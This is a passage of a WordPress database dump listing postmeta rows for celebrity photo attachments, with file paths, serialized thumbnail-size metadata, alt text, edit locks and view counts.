Cox'),(549,70,'_thumbnail_id','111'),(551,112,'_wp_attached_file','2015/06/Tupac-Shakur.jpg'),(552,112,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:648;s:6:\"height\";i:433;s:4:\"file\";s:24:\"2015/06/Tupac-Shakur.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Tupac-Shakur-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Tupac-Shakur-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-534x433.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-648x385.jpg\";s:5:\"width\";i:648;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Tupac-Shakur-629x420.jpg\";s:5:\"width\";i:629;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:32:\"Chi Modu/diverseimages/Getty Ima\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:10:\"©Chi Modu\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:12:\"Tupac Shakur\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(553,112,'_wp_attachment_image_alt','Tupac Shakur'),(554,71,'_thumbnail_id','112'),(556,113,'_wp_attached_file','2015/06/Barry-Manilow.jpg'),(557,113,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:25:\"2015/06/Barry-Manilow.jpg\";s:5:\"sizes\";a:21:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:26:\"Barry-Manilow-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Barry-Manilow-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Barry-Manilow-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-696x522.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:522;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:26:\"Barry-Manilow-1068x580.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_1068x0\";a:4:{s:4:\"file\";s:26:\"Barry-Manilow-1068x801.jpg\";s:5:\"width\";i:1068;s:6:\"height\";i:801;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Barry-Manilow-560x420.jpg\";s:5:\"width\";i:560;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:7:\"C2100UZ\";s:7:\"caption\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:17:\"created_timestamp\";s:10:\"1010352032\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(558,113,'_wp_attachment_image_alt','Barry Manilow'),(559,73,'_thumbnail_id','113'),(561,114,'_wp_attached_file','2015/05/Ian-McKellen.jpg'),(562,114,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:482;s:4:\"file\";s:24:\"2015/05/Ian-McKellen.jpg\";s:5:\"sizes\";a:15:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-300x226.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Ian-McKellen-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Ian-McKellen-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-640x385.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Ian-McKellen-558x420.jpg\";s:5:\"width\";i:558;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(563,114,'_wp_attachment_image_alt','Ian McKellen'),(564,74,'_thumbnail_id','114'),(566,115,'_edit_lock','1444840205:6'),(567,115,'_edit_last','6'),(568,115,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(569,115,'slide_template','default'),(570,116,'_wp_attached_file','2015/05/Jamie-Oliver.jpg'),(571,116,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1000;s:6:\"height\";i:728;s:4:\"file\";s:24:\"2015/05/Jamie-Oliver.jpg\";s:5:\"sizes\";a:19:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-300x218.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:218;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-768x559.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:559;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:22:\"Jamie-Oliver-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:23:\"Jamie-Oliver-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-696x507.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:507;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:25:\"Jamie-Oliver-1000x580.jpg\";s:5:\"width\";i:1000;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:24:\"Jamie-Oliver-577x420.jpg\";s:5:\"width\";i:577;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:5:\"Suzie\";s:6:\"camera\";s:18:\"Canon PowerShot G9\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1265829432\";s:9:\"copyright\";s:12:\"©Suzie Katz\";s:12:\"focal_length\";s:2:\"22\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0166666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:2:{i:0;s:12:\"Jamie Oliver\";i:1;s:8:\"TEDU2010\";}}}'),(572,115,'post_views_count','225'),(573,116,'_wp_attachment_image_alt','Jamie Oliver'),(574,75,'_thumbnail_id','116'),(576,117,'_edit_lock','1444842563:6'),(577,117,'_edit_last','6'),(578,117,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(579,117,'slide_template',''),(580,117,'post_views_count','236'),(581,119,'_wp_attached_file','2015/05/Jep-Robertson.jpg'),(582,118,'_edit_lock','1444765956:6'),(583,119,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:579;s:4:\"file\";s:25:\"2015/05/Jep-Robertson.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-300x217.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:217;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-768x556.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:556;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Jep-Robertson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Jep-Robertson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-696x504.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:504;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:25:\"Jep-Robertson-580x420.jpg\";s:5:\"width\";i:580;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(584,119,'_wp_attachment_image_alt','Jep Robertson'),(585,76,'_thumbnail_id','119'),(586,118,'_edit_last','6'),(588,118,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(589,118,'slide_template',''),(590,118,'post_views_count','326'),(591,120,'_edit_lock','1444837863:6'),(592,120,'_edit_last','6'),(593,120,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(594,120,'slide_template',''),(595,120,'post_views_count','244'),(596,121,'_edit_lock','1444837882:6'),(597,121,'_edit_last','6'),(598,121,'_vc_post_settings','a:2:{s:7:\"vc_grid\";a:0:{}s:10:\"vc_grid_id\";a:0:{}}'),(599,121,'slide_template',''),(600,121,'post_views_count','186'),(601,122,'_wp_attached_file','2015/05/La-Toya-Jackson.jpg'),(602,122,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:755;s:6:\"height\";i:800;s:4:\"file\";s:27:\"2015/05/La-Toya-Jackson.jpg\";s:5:\"sizes\";a:18:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-283x300.jpg\";s:5:\"width\";i:283;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:25:\"La-Toya-Jackson-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:26:\"La-Toya-Jackson-100x70.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:70;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_218x150\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-218x150.jpg\";s:5:\"width\";i:218;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_265x198\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-265x198.jpg\";s:5:\"width\";i:265;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x160\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-324x160.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x235\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-324x235.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_324x400\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-324x400.jpg\";s:5:\"width\";i:324;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x220\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-356x220.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:220;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_356x364\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-356x364.jpg\";s:5:\"width\";i:356;s:6:\"height\";i:364;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_533x261\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-533x261.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_534x462\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-534x462.jpg\";s:5:\"width\";i:534;s:6:\"height\";i:462;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_696x0\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-696x737.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:737;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_696x385\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-696x385.jpg\";s:5:\"width\";i:696;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"td_741x486\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-741x486.jpg\";s:5:\"width\";i:741;s:6:\"height\";i:486;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"td_1068x580\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-755x580.jpg\";s:5:\"width\";i:755;s:6:\"height\";i:580;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_0x420\";a:4:{s:4:\"file\";s:27:\"La-Toya-Jackson-396x420.jpg\";s:5:\"width\";i:396;s:6:\"height\";i:420;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(603,122,'_wp_attachment_image_alt','La Toya Jackson'),(604,77,'_thumbnail_id','122'),(606,123,'_wp_attached_file','2015/05/Lenny-Kravitz.jpg'),(607,123,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:386;s:4:\"file\";s:25:\"2015/05/Lenny-Kravitz.jpg\";s:5:\"sizes\";a:14:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"Lenny-Kravitz-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"td_80x60\";a:4:{s:4:\"file\";s:23:\"Lenny-Kravitz-80x60.jpg\";s:5:\"width\";i:80;s:6:\"height\";i:60;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"td_100x70\";a:4:{s:4:\"file\";s:24:\"Lenn